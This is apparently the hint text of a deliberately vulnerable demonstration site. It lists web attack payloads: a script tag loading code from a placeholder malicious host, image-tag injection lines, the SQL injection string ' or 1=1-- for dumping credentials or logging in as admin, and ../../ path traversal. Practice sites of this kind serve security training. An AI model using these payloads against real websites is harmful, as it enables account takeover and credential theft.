1) <script src="http://yourMaliciousCodeSite.com"></script>
2) <img src="http://some site you want to grab from">
2) <img src="http://a vulnerable site you want another user to inject to">
There are three ways to access this site:
1) Sql Injection - ' or 1=1--
Through the right query string with sql injection you should be able to dump the user:pass combo from the server, or log in as admin
2) Forced Browsing - ../../
The use of forced browsing is very common in servers that have not been secured properly. Sometimes you can find a text file containing information, or even access htdocs on a linux box. This site was set up for demonstration purposes. The file is located in the folder named "pass"
3) Examine the code to see if you see any hints
Many times developers will leave pertinant information inside of the code because they are rushed and forget to remove comments. Other possibilities are they hard coded certain information that can be use full for an attack. Always examine the code to look for clues.